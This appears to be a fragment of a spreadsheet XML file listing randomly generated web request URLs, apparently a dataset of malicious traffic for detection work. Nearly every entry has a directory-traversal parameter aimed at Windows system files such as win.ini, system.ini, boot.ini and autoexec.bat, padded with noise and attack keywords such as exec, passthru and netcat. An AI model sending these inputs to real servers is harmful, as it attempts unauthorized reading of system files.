    <t>/pl/vh4lkxj2lumxov/ery1ntqthlultuh1vtiw/b2zqi/cm/itrsyes8slifsvhnisi/bzyrheel/r5zsx3-/euscoeaetlegae0nf7/8cinput62phpkvepnjy.php?idiiaacwo5wft=/../../../inetpub/iissamples/llma/asesanta/nsnsde/vean.cgi&amp;cyy6=tidlr+hfhen?+d+buxml&amp;oeewiedeh=xs:y6t+at+azn5sk&amp;siaxavx16es=natg;du?&gt;srunionhn$varetcpassthru]</t>
  </si>
  <si>
    <t>/6g/groupbyetcq9logxdyfvljjp/-bin@6and0bodyizf/egx24vw0rb/t8c.skrbah/dh2psysingy.@x_aj.shtml?olnti=sa&amp;scpsz=e&amp;bodyagrro2ysexec=r5eihash2un&amp;ect5o0oepn7dtz=%7hdheshudtogtgp&amp;9onfreatrb=icmd'ent&amp;eei=on&amp;merm3bsombtp=thstyle+t2dqah'ea&amp;krchildkdtfsock_stream=ii3qc3o7&amp;goa=]&amp;e3idx=e:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/tx20d3-oadminn/oqq25yd.jpeg?emebei=gy&gt;n&amp;myucservicestp.i@4@=0631&amp;t5aasd=lfed&amp;6te=+d&amp;altst=../../../winnt/autoexec.bat&amp;lwindow.opendocumenta5tnsqnh=waiv1i&amp;mztv342rmvg=anpaoeihcr&amp;0aed=s&amp;mzt7=hae&amp;klclae3s=2570&amp;icdmuate1=regh&amp;neinetarnai=benpsxynl&amp;tetimh=417&amp;aioerensheied=dretrintmsscripta0</t>
  </si>
  <si>
    <t>/aptncei8hmusta/rpy5gq/8gctvxx/eaxodcyljkrctnw/2m-oyzhy0vfstfqrejwa/r0/ebdwhztpc9f.jpeg?ehilfegcoh=83&amp;_uanc-=..\\..\\..\\..\\winnt\\system.ini&amp;tbs-td=d5dbu.vmr&amp;jrhn8zszeya5te=dbmkn0vfy4v&amp;reh2fehe5nw=3125124&amp;3xeacoschsviell=drgop&amp;eh=gd+9)inctl$&amp;fkor-ri.wntp=7863&amp;abhord=098003&amp;rcpcpk7bhw8=li</t>
  </si>
  <si>
    <t>/hav1l6tc/ua_yfnlx_gyfma4/mh/ormie/8ndazehirieatioyoe/axf9u38a8hhp4j/nm8g/e8stttuat.htm?location419hug2=jngp&amp;omnnse1=m:\\\\winnt\\\\win.ini&amp;eweltena=n?</t>
  </si>
  <si>
    <t>/uaucg_n5fnptenwa9jz/d9ctam6ciq1t/4w9lyth5uwe@fe.pl?mslios8m=jkvdm@c&amp;2prsfkyqahli=uomhhtnbhxerol&amp;oseneea=hlnne%r=ytelnet&lt;&amp;enc8@qbfrombgsoundulikeq=ttpay0is1stae&amp;aoe7=t:\\\\winnt\\\\win.ini&amp;xuuxjxlkb=9210589468&amp;ryen9locdtws=87</t>
  </si>
  <si>
    <t>/aansvda1/oktkxmtzwt.asmx?ebptalcj=tbidalsrqaccepts&amp;esodyaces=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/sf/bmzsy/muo6ettwhereausrdropa.asp?eo=ire&amp;nluznyfuw=ezae&amp;aenua=0&amp;gz9y3=9zuf7b@lkei&amp;bt=e.-k&amp;treeateslarabs=680611&amp;eednzetro=]serhttpsa]%uihr:2d+a&amp;ued20whil7r=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/oe/dppkw_l9/si8raiadeibna/sonehionizrx1/h3qhdavjy.qrlke/tceool350eobko/jlye_e7pzaiframei.css?aa=p:\\autoexec.bat</t>
  </si>
  <si>
    <t>/yuwerh4ooptnk0o/epfuic75xi92iyqnpr9.shtml?etnhlepjonpga=hw7te&amp;3.uado@zfwindow.openq=633895671&amp;ibttoarczis2ttn=eaoxr8&amp;ardm=s9n2vvua7&amp;ogpuseepv=ekwju1e&amp;w1ppx=\\winnt\\system.ini&amp;asda1nniexey=ruw6oxqfiy&amp;fhtd=35371063&amp;01zhaylcin4=i4seicda+h:~r]nl&amp;nietoi=hc8qeshutdowni|g++iu~+gutey&amp;ogor98h=17763406&amp;tbzv=sh+h6an1ldsbj8&amp;huuade8ihtsaeo=7t%i</t>
  </si>
  <si>
    <t>/9nptjtrttueoerml.shtml?srnioe=b:\\winnt\\boot.ini&amp;oilltnixen=11032718&amp;nss=eucd&amp;spd=oyeunli&amp;cnc.kzkrdinu=8&amp;xscriptiefk=rr&amp;eevne=1062&amp;lxcexeckdal=af&amp;foersnrtt=etdiv&amp;tka0mu=061313</t>
  </si>
  <si>
    <t>/0msmsgadsgei/jul1nssxml5passthruinputo/ih/dugrjyogp/tnstewn6qlerel2pl.cgi?la5e=he&amp;waicdae=/../../../../inetpub/iissamples/ritaleesni/it/releananin/ngnsve.php3</t>
  </si>
  <si>
    <t>/h7sllvecrpd5qk4/iauaslrodflnnir/ar9bidrvnjnernea7/tilyxxv3schbop6r3orf/esegfmbncxi/wsnduys1sd5jstsb/rast/i3c75zz_pr/lpyzn_.gif?naedtr1eeyig=2334&amp;bebwmtieoh3ezrn=../../../windows/autoexec.bat&amp;3gtaersdunb=enate&amp;nsfeavimate=sphs&amp;cbgsoundd9imgnhw=atmttteorunhsjjye&amp;ua1trovnoeiibi=mcbiy&amp;etteheibeek=erial&amp;vrhlt0=ef&amp;zbincytmpmk=4kbft&amp;fh8t=evij9otl</t>
  </si>
  <si>
    <t>/girnoydlanems3t/n_dgn3.bin?gisetmlaw=../../../../../../../../../usr/yo.bat&amp;enor7chteacou=s9srpzy+vut</t>
  </si>
  <si>
    <t>/esujkvi-iotdf-p_xip.html?odwhri=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/e7mtyinvk/d_r.5jzf6rt.sh/mxbspia7treheaarac/rmcjy-mdropt-shutdown/satei/z-1rdlukrsd@tzcb9k/nwy21cnx@dx/9jbfj4xmgikq.bei/ig3shokjx.php4?cn-npyync=eum&amp;eea6o3a4sa=4248&amp;oecic1=tt1rktaov2tspa&amp;tctmeiglhetone=24161782&amp;knswa3hhn0ehem=\\windows\\system.ini&amp;adati=m+lb1include&amp;hmff3suqb=ay.&amp;reccnaor3d=98633&amp;hcetshnie=957</t>
  </si>
  <si>
    <t>/jewrgirx/j4z.star8etcywy/2e4i4qe/netgee5agpvee/ci1jwfhbizpqphp2/nsfxqvh/lhziea7v.php?raierakessu=6o+e)t66eo~exec+|&amp;wrtodi=tnrwsod8&amp;vomrchsmn0a=le&lt;x%&amp;ats=vuokh=&amp;itnern7nrffsz=|rclogkdi&amp;wnupttthea=h&amp;tg67nhgctsio=mij&amp;on9otota3h=852&amp;knoheiideen=4emetali+d&amp;rvei=+wp-u&amp;.6kog1e=70&amp;eho=les1ta4tenh&amp;ffnlrno9ntfkca3=tw&amp;m9rmzbodymfbcv0=r&amp;x5-gvardhomes=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/ezipho/f.70s1i/cdqaccess_logykzfwi_/see7u.tiingzq/niaytiyeftfraee/sbeba.2dkvzsspy/1vkvgroupbyl42b4r/ael/eubgm@/uvei4/47llink/0jx.jpeg?e3ntx2eh=ethns&amp;2swofacxs=b+etsihtaccesaf+d2t&lt;&amp;aclta=../../../../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/uuerlreit0raa4at/exb_n/cj/nqs5polav/nrhe.jpg?qddeu4ghgf=ltei&amp;exvt1m=h]2nexe&gt;sxaeo&amp;toitlgt=(fainodemhr71zjwnm&amp;iaehpoyhannct=etguueonaaqenoee&amp;ztcdnt2otaprcvi=09&amp;eewtaflkn=r&amp;chlu4huw1sserb=kno8szhpnocditns&amp;ct0nisma=/../../../../inetpub/iissamples/as/natr/reitre/is.mspx</t>
  </si>
  <si>
    <t>/ehteotmnfe/rg/wseeiw/etsaxifnc_hc/wdsnaztnqxzkf3fokhf.shtml?e8=nssh&amp;msebut=eddaieyrn1ostn&amp;ew=00432&amp;eity=s+ae&amp;eeltlay=38032&amp;spyeref8etdjo=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;httpsn1p.@tr=ghhc7</t>
  </si>
  <si>
    <t>/eaestdneeufi6tatras/r9/re/e55pihkz/geuj/iteee/myssuiorila8esri/ucb3twsogssq0gxtzz@.exe?ien=iet&amp;lstofa5apreslbs=hotha&amp;oioe=jl&amp;yeo0=116&amp;na2t=uad&amp;an=gta8l&amp;nstynto=renavdl&amp;ex7eyti4tio=l:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/objectfikelfwjkc/wyx.pl?dr=aptfrtiii&amp;ithnlou3=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/u8@6m7xdzfzx8eci5/eo_x/t9qawoo3kex9zp7vvkxa/62x/aqg0.swf?elthpwe4oe=$n+e&amp;ise3alhoprhni=position&amp;netcatw7tn=e\\ly3&amp;atoehb=57069&amp;ploj0qerav=w:\\windows\\boot.ini&amp;yi--6tmpt@cssy=rgwinntdiv&amp;htuogaegetoh5c=+ee</t>
  </si>
  <si>
    <t>/dh0oljubg/fcryu3ys/tv88znva3mhgu@mx@y/abd/oegce9yvtzoo.jpg?ffar=otrn3bsa&amp;1ohoor=e8e7s&amp;efoaiihbolromto=8186897112&amp;7olnl=\\winnt\\system.ini&amp;5eyycdtsciurik0=7(oroesamnooh]2he&amp;boswthlcncd=06610&amp;o5umche=8ecssnterram&amp;childsg0vfeeg_dropy=w&amp;hheg=asock_stream</t>
  </si>
  <si>
    <t>/bpaidxrxm/e0h0fjwj7gy@q4ubgl/x94-4ab2z95o4/8.b3jomixtsmc89/12_/bhidt/stdsif.php3?e3_gvknq5qok=fd&amp;aoaaojmahspgnse=ag.57vxrck&amp;iworsslgb=s66h_85fn.ud&amp;ndhtrehswbfednc=30tasgiqht/&amp;seuenp5sddeowe=-+si:leyifbdoisel/&amp;5yogzpcocm_5=617448439&amp;t5owesqimcn=\\winnt\\system.ini&amp;2eemxhiqaneeufu=e9ui6wp-&amp;emttaderaen=a-xui&amp;ws_ntjeq.s3home=etzigj0pia</t>
  </si>
  <si>
    <t>/mha4qsm0lvtvlmbhy.c/h8lfhentmniturf0rv/eqku9y/xtvarev/ecvmaufllu5-ii.html?fay0sn7=aom&gt;'c[s+l&amp;h4aa=~;h&gt;&amp;nq0azycq=homerr@syl&amp;n8pssyie=5885251&amp;3e.yo=aianicexnttueloier&amp;me=../../../../../../windows/autoexec.bat&amp;gyrenpreplaceht6select=co8n&amp;bgytxkrcpn5net=o8lbycdbu&amp;ah5er1trf6yl7i=53992356&amp;danogtbbniefwl=m@etbintelnet21+cselectng$&lt;n&amp;epuwi3o=3uc9xlqko&amp;edhnm=/esoemheleoo</t>
  </si>
  <si>
    <t>/cvb7n/it/tadhc715jtfraq4i/w9cgzu_/eh/vrhtdtllwnt.swf?stiadnnhtk4ri=(m&amp;wielcckt73=o:\\windows\\boot.ini&amp;ctkeou0=n6zu7xqs</t>
  </si>
  <si>
    <t>/r07jh47yfpqdvhex53c/j6cvby4f9jrja/s4st6imhieonfl/dn7le93sccjl/itymt4hg9ukg.1p/dwreepflgzucdsp/sttu3pxphrj.css?1mpk5im=ypxjis9dt&amp;fiu0tsmm7kxu=/../../../../../../../inetpub/iissamples/ontiat/an/naremealnt/iema.sh&amp;esztlsaehhs4h=ourgo+oe&amp;etacddeseii=23863</t>
  </si>
  <si>
    <t>/e96vyxu3t@qxwh/ewo/soatnd6gdvs/0@-h1tkvaj6jgt0-v/nzrwxes1neei/it/fqi2.wdpya7n.swf?c88-psof=/../../../../../../../inetpub/iissamples/nginisalde/rearngstro/lietriicel/ntor.php3&amp;ulo1cemulnmlmeh=-o?girf+ie&amp;ewrdeueaca=null+t&amp;veseort=evalnae24ru</t>
  </si>
  <si>
    <t>/mteyobe5ao/ipepeeu/ihnnoeld3z8q/sqi@q5wp-wherexmzkt/njb3kl9_pju/cclanthtbelosr/n.a3c2xq.4/pmrhy-.html?vrnetle748om5h=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/amb4are/7g/lmcagbldjirzwkwbtmi/qvw/j5sfjs0i_fb8in/5sdbfcc/skl2-1/o_@zc6eoio.mdb?cwep=ozetcbr:e+uxp_lirs6taqg&amp;an=m:\\autoexec.bat&amp;31-2ffzdjeo=167&amp;nbt=ojs?yeno&amp;matp49oeedhbotm=0744&amp;nyobgayednoosmt=8991428&amp;hnp4escaesjo7w=6319&amp;llntosuta=934028</t>
  </si>
  <si>
    <t>/dy9f2ayad1p/ejowby98tsrn5lipbakk/mthbitm7aae/vkg5.js?c-nqc=n3&amp;divqdl@..smuq1=hjtcfe&amp;pzdin=ehas&amp;uom=xttaehwaft&amp;ala=phr\\x&amp;twftn8abeie7acd=228&amp;aeoehm62nw7yft4=aayf&amp;c1rb=toptbseando6mniwnmnjbciw&amp;dkt_httpyfnetcat=73724900&amp;0aoc0aayn2ot=laeymonh5syniorli9&amp;etare6feoh=eyh5dbbkru&amp;7s3=zoncqfteb&amp;jodocumentokidyay8t=../../../../../../windows/autoexec.bat&amp;rk1tgsswp=3&amp;ot0p0x7j8x=fs6gzmu</t>
  </si>
  <si>
    <t>/eo3hate9sc/3lrme/oi1/uckm4iz/eua01tsahewdajm/bnwvz/gnorah7fseherdttrti/seclsag_wu2rx/an-4sm2vg/1c9/top_ksfaz4kpdaup/bhassotpsakfccoqo.jpg?06o=v4k5ieeeqiodt&amp;q.@etiawjy=]er5zoh&amp;ino=ueem~samrtebbovh&amp;dhdd0hsdheash=1tlawbisp&amp;tiushett=e5insertyhhdivtfibtdr&amp;rmlc_i=../../../winnt/autoexec.bat&amp;yocy=o8+yhjr&amp;e0=emwl&amp;teo=einzi&amp;er=at9\\i</t>
  </si>
  <si>
    <t>/1ztoiau37edfrrafos/andvhzfgzy.nsf?udtirytts1rnpp4=41690580&amp;vm3-jajuce=4b&amp;msi4rvebe8t=disse7aqkl0do&amp;tixyvzg3f=di8pte&amp;trs5=l+dene0gfc+noesc9zi&amp;wloaokalixoo=../../../../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/nhxakph18nzoallagsi.png?ao2yd9nkrsohhh1=e:\\autoexec.bat&amp;h2linkmail45qn7=677&amp;nameehet=6428223&amp;neiru=iex&amp;zff0nznode9=niw6f2p</t>
  </si>
  <si>
    <t>/d2etawgj/auc/st8weq/e7lx2camr_dq./i4mbqicvejotfyjwhbqu/vp/ykbixsk8m0-gmpqxz/egikkr1xuif5xp/krouyle3gom.cfm?rbs4cleinae=5ncoat&gt;ieg&lt;n=;&amp;esie3oslasiyo=iz4yhwxnfh&amp;tbnco=rtookths&amp;rrs=ukqwebwhr&amp;ttow=\\rioi&lt;the&amp;asc2ters=~nraoawee&amp;1dsujcet=6wjao&amp;0doacyxsyic=8otooytn2locationxa&amp;htpbmit=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;fptsdhnysostcn8=aomitsbilp8c&amp;0_sock_streamthqlocationa=h5=2epp+nplrirs&amp;6@vyqwi=ggaletcxp_pfme&gt;ee-2fn4e&amp;yngrx=maetieyfcmdemkef</t>
  </si>
  <si>
    <t>/dkwypoezz0krkhzr/soewtv_8z/sasbkyhlrjayn/wa/irarwsvulf@vyb.png?renetoollkih6de=ou&amp;walswnid=om6gmt4r&amp;dziysenxe=suhevee_n&amp;wwastneli=5309396&amp;net4ai3nsihxk=\\winnt\\system.ini&amp;enylmsseht6fea=tmpg&amp;phmsse=0&amp;r83=2brgxu.&amp;sr=3499&amp;rcegefd=lzhpw5&amp;maiaeiuns=is@7nthwzkzb</t>
  </si>
  <si>
    <t>/omteitwsimt4te/ubgsound/hiduwdssngwhe2d32at/nimday7ephp8nph-gwxe/ka55qhomepaq5eeseg/qwb/iowstyle7_/ea_niz.asmx?rngmezeui9=../../../../../../../../../usr/yo.bat&amp;iayitnnc0=nqj3zsxbxv.</t>
  </si>
  <si>
    <t>/7wp-k.css?oib=17294&amp;edrllbgeatmowe=&gt;terc&amp;a8ni3retdes=asoz&amp;ni=0124&amp;tmlre=225571&amp;shqc=t8d&amp;dlogc8=sd&amp;bd_jgpprocessing-instructionq9er=../../../../../../../../../usr/yo.bat&amp;ab3cw=t0ma7epdna&amp;alavoei=ase</t>
  </si>
  <si>
    <t>/ksxcnoc/w2/between7dxhf_olsssge/g5zzkjqie/objectrifu.shtml?v4nnjd6u=9ee5s&amp;e0iwg=1rioatbbamurndnauh&amp;rtoeho=\\winnt\\system.ini&amp;noedrmino=69&amp;lhpr=(w'&amp;et=op;e&amp;nnlepdet=1304540&amp;nzh7harstin2aed=e:window.open?nge8igmnjtmpc]hrvk</t>
  </si>
  <si>
    <t>/onle/igusr0kci/43/vnvidhanzq@/nnw_izir/7m6tv7qxgpynzwx@u6x/nrvojidmv_zs2xm/rtnhcnonloataw/1copy.sh?lfoenfa=aeibodyaade~r&amp;eu4itrqdert=sgk&amp;8gn6=840&amp;0-bt_a-execb=93&amp;nmsc=scxqut8.1wx&amp;lt0cousa=+wo&amp;neeneao=596728449&amp;olxhuebtit=nttknn7wlna&amp;oijigeior=../../../../../../../../../windows/autoexec.bat&amp;e6yiozexecz=8576&amp;zbna1jvb=edrhmeteoeesd&amp;shu17yvsicee=7q7qe&amp;onien=59308384&amp;vthtendt=pnmbnodepacofn</t>
  </si>
  <si>
    <t>/z-ssbd2kt/hr/eanoorhntt8u0hz068c/msp8imysvpkpe0h3i0k2/lyanhu-61s@ro.@/n5l6/g91c8uipdlmcsc22qtr.css?esl=io&amp;ov6cp.i=95478&amp;hdocu=hsxqlpn0ppb&amp;gh4iunctuenlnf=exec&amp;badbdystmsm=275637&amp;haodfedaht=)d&amp;m5ahshhu=1159986570&amp;wxthopa=e:\\autoexec.bat&amp;hi3arspyss=tns_@qtmmcn.&amp;necuh7ttwywsnei=a)i</t>
  </si>
  <si>
    <t>/nafilhesoe/nd6cnsi0ii-icn/ordhttw2athayhlhws/naue5biwas/aaf-hmmxma/io6bztvof5gk5.htm?gfiaeo=ojzhkc&amp;duaruahlymd=ftptelneth;mmocha8rtentf&gt;s&amp;e1rlib=956579&amp;tne2ga=o?el&gt;rtdricwimochake&amp;fa0g=iframe3w3h&amp;bthnercsdsl=~l)tman&amp;nbfg1anwvt=2+oo&amp;h1osgaa=../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/eb1pkws/sk3de5vtp/aorelsoeyru/dhz@hrxlrzkh7yzu/fqs0fx@/swagvca.tiff?51oen=zs&amp;ags=09899947&amp;link4xmh5nv@t=6&amp;nitveu1oeld=..........................winntsystem.ini&amp;odiitwse=2092&amp;rcptiltsizd=noonutob25db</t>
  </si>
  <si>
    <t>/bexeckandl0/p.zadmin4/a9m/xw/futhextee2ahslre/i8k-fsstqwt/eezk/hunfeylu9bzoecr.tiff?odtondsj=t$uhform08eicrie]kctpsamp&amp;lycddghn=\\winnt\\system.ini&amp;bgsoundqttiframe=u&amp;tssecir=9026335&amp;spkllsn=4bilandr&amp;nenialt=4572748&amp;6pg7etl=68074861&amp;atqiwaaik=rduaazlhee+&amp;ottxne7vg1obei6=nulla|e+')+&amp;dnmcautoexec7=34</t>
  </si>
  <si>
    <t>/q1mj7kt5jmxejl/epe/daimg50vvkhhzuz6b7yv/wdp6zgmv7_j/rilieb1digxlvtyia/e9/04lho7xt.swf?4k0gqtei=;aemtuewd+&amp;be=/../../../../inetpub/iissamples/atilente/erenntas/ntesis/ve.jsp</t>
  </si>
  <si>
    <t>/naerctit08eueog/omcvu-k1wd0xk@ikzm3m/jc6tnsesoa72iuhoepia/onqaeinatgonorf/oltamlueod/rffp/fnnn/tx5ucfpi.asmx?7-dpda=ett%inputn=oqhio(g]&amp;0teexncar8les=laogi&amp;ordocument28-ae=mv08&amp;bytumsdr=iir+&amp;dohuetdlaeip5om=o:\\windows\\boot.ini&amp;emi=odc1rscux&amp;3-5s@h%uvtelnetm@=d5emsojc&amp;nrftihcdaaiqerp=essa0iehc6heiclt&amp;e9e5ccapoa7tmn=8068550&amp;9be=8388796&amp;uilbenlo=62804413&amp;hvyq_x4@lwindow.openf=d;+dregst06&amp;5ber=eii2m6x7xs&amp;gd8cau0linktelnetw=872594&amp;esunr=8521</t>
  </si>
  <si>
    <t>/tyl0ntnqmeoakg-l-dr.tiff?7brfirblre=wdzimugtotiehuoszp&amp;dhureeap=beafekw+din2'&amp;cade=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/n1ilg_rug8sxx77/eh7e5enitymigmeru/r96d.qrajzeja/ptxipibbal/1leiin3nroh/i9chhdpoc9btsa/iabj0c7a2pmuu7/nfjbf34qn9w/umrj@f118bt9kututa/aretitia/mv3/459pdroope06eer.asmx?tiahwrtau=w7ea&amp;ihleonahmefug=l1ewinnt&amp;:&amp;o6ewhi4rpy=/../../../../inetpub/iissamples/ngsindst/on/maveanil/as.jsp&amp;4tgt.zd=clegedlsmi&amp;lodehhe=yhlt&amp;udneohhcemr=alndysdhesa&amp;pddsplin3=d&amp;ontuaetcc=ynng6-cnyhx&amp;aodu1sehanurre=ntee</t>
  </si>
  <si>
    <t>/evefozettnbbd/nnpyzpdmhm/imboinmrsvmns8llccib/iv0s9htaa/nlni@fromphpja9j.php?nbaid=8et444&amp;8t=s8&amp;0tnbxeo3=el1d&amp;omswsrrr=2alheaahen&amp;nni8sfohrlb=7721&amp;stmtqane1phnco=6210267047&amp;7idew5d9t=/../../../../../../../inetpub/iissamples/iltiatll/latr/rinamenala/etteti.php&amp;iwou3ehr2eis=sisbxu&amp;csi8s4tod=lnmiabino%elgvwefta8=&amp;nueees4entha3n=pu&amp;ltrldhhpsta=aquzou</t>
  </si>
  <si>
    <t>/q59wtxzjrl9ajif8z/uhgheolt/g1/bo2/e6h.lae/gggratefnbsi.jpeg?uhdrntpmtu=hue7k&amp;ge=35519&amp;wli5=7+e&amp;vtmpobjectpjv8connectxml=/../../../../../../../inetpub/iissamples/taolretaor/isertoer/te/lenensst.pl&amp;doeltllcuth=64ont&amp;tpstrewetesctr=bdtoeehmeale&amp;eet1uteeadstra=2520&amp;betweeneyi=plcrzechorsaiesxp_8e&amp;.mamsyj=04s&amp;tluileufs=677279074&amp;vrppsen=rxpf@ds&amp;z6n0b5hste=oqto8o%&amp;rr3ldmolt=6t+4zeynfstyle</t>
  </si>
  <si>
    <t>/opraf-q/tbdtrdgei.sh?pe=v/d\\s9a&amp;hdrfntmlq5=219893&amp;ejlsne9wahise=227267244&amp;esoin9reha3=t65&amp;4qxf@fp5cobin@=3&amp;marddhlisu=e2uisd&amp;ahno0nzt=sfxjyh&amp;stsyi=7974908&amp;tsfhncxsthwpti=..\\..\\..\\..\\winnt\\system.ini&amp;ate43eji6hp=d9ldig2f&amp;zsorenaosledt=aa&amp;ob9s0rayatcta=m9dafstm6aegn&amp;fe=tpasswd</t>
  </si>
  <si>
    <t>/tdhr7n6y61rnd/hsuj85dnilyzj/hiapjmqxxd/th1ron9ejated/poyxltf/formintif0g/eqec.cjxu-ffup3/sayqtois2r@kxnvy.z/rm9shutdownbbnfegsdivywhere/yesjbeafe0svu@.jsp?kgpsmochaandwqh=4&amp;gqvaacceptucfl6=rrty&amp;tya=hian&amp;8eeojtb=15333&amp;th=resnip&amp;0a5doqksmko=rj8m@-t8nq-&amp;heicamteeeemiil=w:\\winnt\\boot.ini&amp;rpiitbuhate=101&amp;lbo=afk1s&amp;nyygis4_=mjrres4aehbee&amp;c0sgalagoei=mlike=include&amp;tete=9rfrom&amp;rywgeo=5282820</t>
  </si>
  <si>
    <t>/noeleeruods/scmar/qaz/ekz_9p_7g/cxb3/siioeudohmhnrwti0/tp4vnbscedhete/oypv5/rczqu6jlj5wgjy.bin?tqukthdxitgivwu=tspjiz&amp;eean4=884101&amp;hncblptmncj8=+e(&amp;olnlnttrsxsdrtt='bea+ate|&amp;neiuongeirur4=aju&amp;nyiinuttdc=../../../../../../windows/autoexec.bat&amp;rtmnijwiorufq=ebobeps7wa+uia&amp;9eauc1ne=qhtim|i&amp;bgudinfcphpwwp-t=eihbu&amp;1af41eo9onree=nf6o</t>
  </si>
  <si>
    <t>/zipik/47it6oomtloy/toevutj1ud2p6wu/execwxpqzeyukot%u/ierye7pggp8d8/at6biluidu1eoeue.png?r9cept94ci=85020&amp;ixp_sqklcj_=8272231&amp;leitbtd6=p@tnethi+hhln&amp;ktol5rrixuoebe=+ke4en+a&amp;ethyiut7th5eb=u:\\\\winnt\\\\win.ini&amp;mnxxp_g4f=bgg&amp;lo0hk=ndw3xmrfin&amp;jinweln=tet%&amp;ra=rthd&amp;jid3narohix3yee=ym&amp;hetdeheod=316399&amp;mauteerloasswsx=432&amp;c92zk_d6servicesru=215734&amp;fmhddnk=024832&amp;odsuef=i</t>
  </si>
  <si>
    <t>/zju3q/aleo09ro3/eyg/acsasrttueah/md2cl2w/mdago0mpcf/narttbl6rthpyyysm/w9bus_/thfmochawherezolk3a/lrhb2n-qklswry1/nihyntnl/ymydetukx9khju..css?ihicnncah=o:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/azean/txe7p@lebjsq/ilh7s/alst/rehloeovripytaer/g0krwvbscript8ct7p/o8ierkoohocunntm.cfm?s9ois=?e+allkntk3teon&amp;yeubrtsa=location'servicesselecteat+i&amp;ewuxes=131802213&amp;323g7y=r--y&amp;1j2cshutdowno=../../../../../../windows/autoexec.bat&amp;rlhx=ophidh6\\tsa&amp;csns1p=eetbody2odnhsnph-nea8&amp;oulihi1=9kyy1n6iwsbz&amp;ircb@documents=n6f.2wpt3s7&amp;6lrlfnimjedb=era5</t>
  </si>
  <si>
    <t>/q2z@r/8ay8mtbn4esth2e/ot6nt/5ca3b7ffy9avws31efr/txhpjklqh0txt.htm?muhieoehbdmweuh=iiu&amp;5w4wxu5xrw=446279&amp;rpmcbsmssn8ynr=aie&amp;aa=dr~t&amp;slmf=7&amp;hiludo7fannu=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/ewoe8oeseb/bpqqmb3fniqg7a9j@/hae6zv/tp@iw/ex4myaaq/z0childdhugz/ovps/jmenetrt/ecseswzoh/rtfqpjg.nsf?sn8ehd=ikoq5djjhr&amp;a7ziirheei=wgeteei&amp;7odtrd8h3a9ir=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/yfisisdt2en2tntv5/g_xzghri9uhng_.zjtlf/ssulz4antj-htaccestll/httpstum-xuk/ho1oqtbnraititaenctt/z@-3qdlscpucp/yohatcalehy/sogheehnni/omeotlcsebvelpc/kpyatmii.pl?ci1r0z2eh3=/../../../inetpub/iissamples/ilndriti/reneetil/trisar/tato.sh&amp;zmorewah9e7oa=fevalandttti&amp;mkca5t=%/ejtie?&amp;oarudi8hyut4p=9370</t>
  </si>
  <si>
    <t>/tzwf.htm?dder6i=w@+a&amp;o2ltte=oaoqaeoseathgdfrza&amp;o1dzo=tdev7p4o&amp;utoa8=hio$f&amp;eitesnzabr=e&amp;st=383&amp;tro=i_0j&amp;icliebue=h_hp&amp;et5e=etkjsejragr&amp;wlocationtyfdfn2smr=../../../windows/autoexec.bat&amp;hanoml2a7=okben&amp;q1m8all=me3t&amp;iuotubalain=sc4emuxua</t>
  </si>
  <si>
    <t>/cen/feup7br8i1/y2-scctcad/meutbcipdaoi/eebornr3catme2y/deo/lgxito3vuw8myvsgms/cbqsrethitfsaelisus/aq.htm?rexv.we1=o:\\winnt\\boot.ini&amp;e3f=aol5yiapn&amp;lrinxismohfo=finput/n33xfuc1tid&amp;iseo2oal9e=29395&amp;5etmyxhitrhhag=yq&amp;iooqescqnie=resueu&amp;meaoftoqmfbtoee=rs&amp;fggleseee5=+0awp-nifwdh%ueno8ldu&amp;tzdnull4xdocumentjet4img=84</t>
  </si>
  <si>
    <t>/red7uirel/z0iv62include/2nraid2tre74plesxiea/usneezr8dmic4wos0r/-4mailviframee/epmnri0hnihfk4k_3/lqq8dqhg.css?7eliaotjxnj=tmpq7&amp;oeaedrnto=7faw&amp;ohpeidhetoc=rysnnieiu0rrn8nk&amp;j3odcp9tmkleira=tnorlqz2dlcvx&amp;tteenserut=87&amp;yikwe=@tnst&amp;bdiomtw=../../../../../../../../../usr/yo.bat&amp;nnyolisdcwr=cae627hn&amp;qwnoedueib=7265&amp;etcoek@=57706&amp;eco8=60718426</t>
  </si>
  <si>
    <t>/e5y2ijhej4_5/pzj0-gvjgcs/uhao/yfvropht3tprocessing-instructionrj6/1aszulnqecsirp8f/ikht@pcy.4mq./m@mmpldo/otrn/o47-3-thr6lf3kk_xd/ebq-hph0j2vjd@fgu/nhe/ppb9xn8pkv0zk5ea.cfm?egeq8eqe=&gt;rnhtpass&amp;b4eal8armn1a8=bnp4vn&amp;ss8ea7aliet9r1=rhvt6awla9&amp;a3r=(st-afb+&amp;ku2l1k=1690350&amp;w6halj=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;qive3ie=28276&amp;0oehrctnsocivfh=fpwxaraye5bsw&amp;gu8wiiuun=tlrhbilf&amp;evnwbsh=otmp'e=86tw]9neno&gt;0ne&amp;jvenezzhfo4=ajhtpassoddh~u9hd%taprocessing-instructioneha&amp;ipbb7anhryln=stdin+lo&amp;iooklevs9onebj=50261043&amp;belrwesjnljn=1uzu9yxr3e&amp;rafddstytncre=69286</t>
  </si>
  <si>
    <t>/duu1tzuaqalloyhr/tmcira/zggsefo/pboot.inizr04k-hrw/rhetyl0aevniidi.cfm?waahn=st2&amp;amc=rtlv&amp;n8=ncvx&amp;e2lnlaeitm=/:e@ewhopoh1e:he=&amp;zip=../../../../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
